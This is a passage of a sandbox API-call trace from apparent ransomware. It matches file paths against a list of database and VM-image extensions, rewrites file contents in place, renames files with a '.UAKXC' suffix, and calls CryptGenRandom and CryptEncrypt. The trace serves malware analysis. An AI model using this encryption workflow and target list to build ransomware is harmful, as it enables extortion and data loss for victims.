(lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".kdb") returned 0x0 [0148.487] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".kexi") returned 0x0 [0148.487] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".kexic") returned 0x0 [0148.487] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".kexis") returned 0x0 [0148.487] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".lgc") returned 0x0 [0148.487] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".lwx") returned 0x0 [0148.487] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".maf") returned 0x0 [0148.487] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".maq") returned 0x0 [0148.487] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".mar") returned 0x0 [0148.487] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".mas") returned 0x0 [0148.488] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".mav") returned 0x0 [0148.488] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".mdb") returned 0x0 [0148.488] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".mdf") returned 0x0 [0148.488] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".mpd") returned 0x0 [0148.488] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".mrg") returned 0x0 [0148.488] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".mud") returned 0x0 [0148.488] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".mwb") returned 0x0 [0148.488] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".myd") returned 0x0 [0148.488] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".ndf") returned 0x0 [0148.488] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".nnt") returned 0x0 [0148.488] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".nrmlib") returned 0x0 [0148.488] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".ns2") returned 0x0 [0148.488] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".ns3") returned 0x0 [0148.488] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".ns4") returned 0x0 [0148.488] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".nsf") returned 0x0 [0148.488] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".nv") returned 0x0 [0148.488] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".nv2") returned 0x0 [0148.488] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".nwdb") returned 0x0 [0148.488] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".nyf") returned 0x0 [0148.489] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".odb") returned 0x0 [0148.489] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".oqy") returned 0x0 [0148.489] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".orx") returned 0x0 [0148.489] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".owc") returned 0x0 [0148.489] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".p96") returned 0x0 [0148.489] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".p97") returned 0x0 [0148.489] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".pan") returned 0x0 [0148.489] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".pdb") returned 0x0 [0148.489] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".pdm") returned 0x0 [0148.489] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".pnz") returned 0x0 [0148.489] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".qry") returned 0x0 [0148.489] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".qvd") returned 0x0 [0148.489] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".rbf") returned 0x0 [0148.489] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".rctd") returned 0x0 [0148.489] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".rod") returned 0x0 [0148.489] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".rodx") returned 0x0 [0148.489] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".rpd") returned 0x0 [0148.489] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".rsd") returned 0x0 [0148.489] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".sas7bdat") returned 0x0 [0148.490] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".sbf") returned 0x0 [0148.490] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".scx") returned 0x0 [0148.490] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".sdb") returned 0x0 [0148.490] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".sdc") returned 0x0 [0148.490] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".sdf") returned 0x0 [0148.490] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".sis") returned 0x0 [0148.490] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".spq") returned 0x0 [0148.490] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".sql") returned 0x0 [0148.490] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".sqlite") returned 0x0 [0148.490] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".sqlite3") returned 0x0 [0148.490] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".sqlitedb") returned 0x0 [0148.490] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".te") returned 0x0 [0148.490] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".temx") returned 0x0 [0148.490] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".tmd") returned 0x0 [0148.490] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".tps") returned 0x0 [0148.490] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".trc") returned 0x0 [0148.490] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".trm") returned 0x0 [0148.490] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".udb") returned 0x0 [0148.490] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".udl") returned 0x0 [0148.491] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".usr") returned 0x0 [0148.491] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".v12") returned 0x0 [0148.491] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".vis") returned 0x0 [0148.491] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".vpd") returned 0x0 [0148.491] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".vvv") returned 0x0 [0148.491] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".wdb") returned 0x0 [0148.491] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".wmdb") returned 0x0 [0148.491] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".wrk") returned 0x0 [0148.491] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".xdb") returned 0x0 [0148.491] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".xld") returned 0x0 [0148.491] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".xmlff") returned 0x0 [0148.491] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".abcddb") returned 0x0 [0148.491] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".abs") returned 0x0 [0148.491] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".abx") returned 0x0 [0148.491] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".accdw") returned 0x0 [0148.491] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".adn") returned 0x0 [0148.491] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".db2") returned 0x0 [0148.491] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".fm5") returned 0x0 [0148.491] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".hjt") returned 0x0 [0148.492] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".icg") returned 0x0 [0148.492] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".icr") returned 0x0 [0148.492] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".kdb") returned 0x0 [0148.492] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".lut") returned 0x0 [0148.492] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".maw") returned 0x0 [0148.492] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".mdn") returned 0x0 [0148.492] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".mdt") returned 0x0 [0148.492] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".vdi") returned 0x0 [0148.492] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".vhd") returned 0x0 [0148.492] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".vmdk") returned 0x0 [0148.492] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".pvm") returned 0x0 [0148.492] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".vmem") returned 0x0 [0148.492] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".vmsn") returned 0x0 [0148.492] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".vmsd") returned 0x0 [0148.492] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".nvram") returned 0x0 [0148.492] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".vmx") returned 0x0 [0148.492] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".raw") returned 0x0 [0148.492] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".qcow2") returned 0x0 [0148.492] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".subvol") returned 0x0 [0148.493] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".bin") returned 0x0 [0148.493] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".vsv") returned 0x0 [0148.493] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".avhd") returned 0x0 [0148.493] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".vmrs") returned 0x0 [0148.493] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".vhdx") returned 0x0 [0148.493] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".avdx") returned 0x0 [0148.493] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".vmcx") returned 0x0 [0148.493] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".iso") returned 0x0 [0148.493] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.493] WriteFile (in: hFile=0x6f0, lpBuffer=0x397fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x397fc78, lpOverlapped=0x0 | out: lpBuffer=0x397fd70*, lpNumberOfBytesWritten=0x397fc78*=0x20c, lpOverlapped=0x0) returned 1 [0148.548] WriteFile (in: hFile=0x6f0, lpBuffer=0x397fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x397fc7c, lpOverlapped=0x0 | out: lpBuffer=0x397fc80*, lpNumberOfBytesWritten=0x397fc7c*=0xa, lpOverlapped=0x0) returned 1 [0148.548] SetEndOfFile (hFile=0x6f0) returned 1 [0148.548] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.549] ReadFile (in: hFile=0x6f0, lpBuffer=0x4b20000, nNumberOfBytesToRead=0xf31f6, lpNumberOfBytesRead=0x397fc80, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc80*=0xf31f6, lpOverlapped=0x0) returned 1 [0148.685] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0xfff0ce0a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.685] WriteFile (in: hFile=0x6f0, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0xf31f6, lpNumberOfBytesWritten=0x397fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc2c*=0xf31f6, lpOverlapped=0x0) returned 1 [0148.766] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0xf31f6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.766] ReadFile (in: hFile=0x6f0, lpBuffer=0x4b20000, nNumberOfBytesToRead=0xf31f6, lpNumberOfBytesRead=0x397fc80, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc80*=0xf31f6, lpOverlapped=0x0) returned 1 [0148.984] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0xfff0ce0a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.984] WriteFile (in: hFile=0x6f0, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0xf31f6, lpNumberOfBytesWritten=0x397fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc2c*=0xf31f6, lpOverlapped=0x0) returned 1 [0149.078] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0xf31f6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.078] ReadFile (in: hFile=0x6f0, lpBuffer=0x4b20000, nNumberOfBytesToRead=0xf31f6, lpNumberOfBytesRead=0x397fc80, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc80*=0xf31f6, lpOverlapped=0x0) returned 1 [0149.119] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0xfff0ce0a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.119] WriteFile (in: hFile=0x6f0, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0xf31f6, lpNumberOfBytesWritten=0x397fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc2c*=0xf31f6, lpOverlapped=0x0) returned 1 [0149.278] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0xf31f6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.278] ReadFile (in: hFile=0x6f0, lpBuffer=0x4b20000, nNumberOfBytesToRead=0xf31f6, lpNumberOfBytesRead=0x397fc80, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc80*=0xf31f6, lpOverlapped=0x0) returned 1 [0149.318] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0xfff0ce0a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.318] WriteFile (in: hFile=0x6f0, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0xf31f6, lpNumberOfBytesWritten=0x397fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc2c*=0xf31f6, lpOverlapped=0x0) returned 1 [0149.324] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0xf31f6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.324] ReadFile (in: hFile=0x6f0, lpBuffer=0x4b20000, nNumberOfBytesToRead=0xf31f6, lpNumberOfBytesRead=0x397fc80, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc80*=0xf31f6, lpOverlapped=0x0) returned 1 [0149.473] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0xfff0ce0a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.473] WriteFile (in: hFile=0x6f0, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0xf31f6, lpNumberOfBytesWritten=0x397fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc2c*=0xf31f6, lpOverlapped=0x0) returned 1 [0149.478] CloseHandle (hObject=0x6f0) returned 1 [0151.059] GetProcessHeap () returned 0xea0000 [0151.059] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0x77920d0 [0151.059] lstrcpyW (in: lpString1=0x77920d0, lpString2="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" [0151.059] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpString2=".UAKXC" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.UAKXC") returned="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.UAKXC" [0151.059] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.UAKXC" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab.uakxc")) returned 1 [0151.061] GetProcessHeap () returned 0xea0000 [0151.061] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77920d0 | out: hHeap=0xea0000) returned 1 [0151.061] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef5818 | out: hHeap=0xea0000) returned 1 [0151.061] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeac40 | out: hHeap=0xea0000) returned 1 [0151.061] CryptGenRandom (in: hProv=0xecf568, dwLen=0x20, pbBuffer=0x397fd50 | out: pbBuffer=0x397fd50) returned 1 [0151.062] CryptGenRandom (in: hProv=0xecf568, dwLen=0x8, pbBuffer=0x397fd48 | out: pbBuffer=0x397fd48) returned 1 [0151.062] CryptEncrypt (in: hKey=0xecf820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x200) returned 1 [0151.063] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0151.063] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f0 [0151.063] GetLastError () returned 0x0 [0151.063] GetFileSizeEx (in: hFile=0x6f0, lpFileSize=0x397fc88 | out: lpFileSize=0x397fc88*=1608) returned 1 [0151.064] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".4dd") returned 0x0 [0151.064] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".4dl") returned 0x0 [0151.064] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdb") returned 0x0 [0151.064] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdc") returned 0x0 [0151.064] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", 